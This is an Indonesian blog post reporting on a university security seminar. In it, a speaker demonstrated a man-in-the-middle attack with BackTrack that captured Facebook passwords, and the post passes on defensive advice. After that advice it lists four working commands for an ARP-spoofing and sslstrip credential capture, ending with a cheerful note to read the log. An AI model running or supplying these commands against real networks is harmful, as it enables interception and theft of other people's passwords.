Skip to main content

Possibility Hacking: MitM Attack Menggunakan BackTrack

Ide awalnya saya ingin menulis ini saat acara berlangsung. Berhubung acaranya sangat menarik, membuat saya jadi tidak sempat untuk menulis langsung saat acara. Kebetulan saya juga ikut melakukan demo yang dilakukan nara sumber.

Seminar tentang keamanan yang diselenggarakan oleh Himpunan Mahasiswa Teknik Informatika UPN "Veteran" Yogyakarta menghadirkan 2 narasumber dari Komunitas BackTrack Indonesia, +AbrĂ£o Ximenes dan Hat Secure, +novizul evendi  . Topik yang disampaikan oleh Abrao selaku nara sumber pertama adalah tentang Man in the Middle (MitM) Attack. Di awal Abrao menjelaskan konsep dasar MitM Attack yang tanpa disadari oleh orang lain. Konsep dasar tersebut dapat Anda baca lebih lanjut di  http://www.ilmuhacking.com/basic-concept/mengenal-serangan-man-in-the-middle-mitm/.
Abrao Saat Menyampaikan Materi
Tidak sekedar mengupas atau menjelaskan konsep dasar Abrao mendemokan MitM Attack menggunakan BackTrack. Terlihat jelas saat mendemokan harus mempunyai kemampuan dasar tentang sistem operasi Linux karena BackTrack merupakan sistem operasi berbasis Linux. Dalam hal ini sistem operasi Ubuntu yang telah dikustomisasi untuk keamanan sistem dan jaringan komputer. Tidak lupa Abrao mengenalkan beberapa alat bantu yang tersedia di BackTrack.

Saat sesi demonstrasi, cukup mengagetkan dalam hitungan detik saat ada orang yang mengakses Facebook langsung tercatat password dari sang pengakses. Kebetulan Abrao telah menjalankan proses penyerangan dengan menggunakan alat bantu yang sudah tersedia di  sistem operasi BackTrack. Jika saat ini peserta membawa notebook bisa mencoba BackTrack secara langsung karena sudah disediakan CD BackTrack oleh panitia penyelenggara. 

Melihat demonstrasi tersebut membuat kita harus lebih waspada saat mengakses sebuah situs web. Abrao memberikan sarankan, supaya kita lebih berhati-hati dan cermat dalam mengakses situs web. Adapun sarannya sebagai berikut:
1. Memastikan konten dan alamat yang dituju menggunakan protokol  aman contohnya: https
2. Menggunakan komunikasi data pribadi seperti akses broadband atau 
3. Menggunakan Virtual Private Network.  
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo arpspoof -i wlan0 192.168.0.102 192.168.0.254
sudo sslstrip -a -w ~/fb.log
selamat membaca log




Labels:

Comments

Post a Comment

Popular posts from this blog

Kesalahan Dispenser

Pada umumnya beberapa orang menyebut dispenser mengikuti istilah pada KBBI yaitu peranti elektronik yg secara otomatis dapat memanaskan dan mendinginkan air yang siap diminum. Ternyata ada istilah lain menurut KBBI yaitu mesin penjual atau mesin penyaji. 27 Desember 2013 saya melihat Anjungan Tunai Mandiri (ATM) dari Bank CIMB Niaga sepi dari antrian. Masuklah ke ruangan yang lebih besar dibanding ruang ATM lainnya. Berencana mengambil uang namun gagal, dicoba berulang-ulang ternyata masih gagal dengan pesan galat: Transaksi tidak dapat diproses karena kesalahan dispenser Pertama melihat pesan tersebut pasti merasa aneh, kok dispenser ngeluarin uang, air dong yang dikeluarkan . Termasuk saya yang merasa aneh dengan pesan galat tersebut. Merujuk KBBI saya masih merenungi arti dispenser yang digunakan Bank CIMB Niaga dalam mesin ATM.
Post a Comment
Read more

Tidak Mudah Melacak Ponsel atau Modem Hilang

Setelah kejadian pencurian dirumah , saya baru sempat tadi pagi menghubungi pihak operator. Alat komunikasi berserta kartu dari operator pun lenyap dibawa oleh maling. Sehingga sampai saat ini saya juga sulit komunikasi melalui jalur internet maupun ponsel. Ponsel sulit dihubungi karena charger ponsel pun dibawa maling :(. Sementara masih pinjam teman kantor :D.  Per hari ini, tanggal 15 Maret 2010 saya tidak berlangganan internet sampai batas waktu yang ditentukan. Alasan saya berhenti sementara (3 bulan batas maksimal dari operator) sangat sederhana yaitu pihak operator belum/tidak bisa melacak ponsel atau modem yang hilang. Saya pikir mudah melacak keberadaan ponsel atau modem mudah sesuai artikel yang saya baca di http://www.scribd.com/doc/6303977/ThorpeGlen-Cell-Snooping-Sales-Presentation-2008 :D Ternyata saya ingin tahu keberadaan ponsel atau modem ternyata belum/tidak bisa.Padahal hilangnya ponsel dan modem saya mengandung unsur tindak pidana. Yaaa... apa boleh buat mun...
2 comments
Read more

Sentinel di Linux

Tak terasa dipenghujung tahun 2021. Lama juga tidak pernah menulis blog. Kangen itu pasti ada, apalagi kemarin seorang teman muncul di suatu Grup Telegram yang cukup aktif berbagi pengalaman menggunakan Linux dan menariknya dia selalu berbagi dokumen dengan cuma-cuma alias gratis. Di akhir tahun ini saya cuma sekadar meninggalkan jejak lagi, semoga tahun 2022 semakin cepat dalam berkarya. Beberapa tahun belakangan ini sudah ramai membahas tentang SSD bahkan riset forensik digital dengan barang bukti elektronik SSD. Kebetulan saya ada riset terkait hal tersebut hanya belum terpublikasi. Tinggu tanggal mainnya. Bicara tentang SSD seringkali pengguna MS Windows memeriksa kinerja dari SSD menggunakan Sentinel. Tentu di MS Windows sudah menggunakan antarmuka grafis. Naahh bagaiman di Linux? Jangan khawatir. Antarmuka teks pun tidak masalah. Sama dengan MS Windows, pihak Sentinel sudah menyediakan Sentinel versi Linux, bisa dilihat halaman  https://www.hdsentinel.com/add-on-linux-install...
Post a Comment
Read more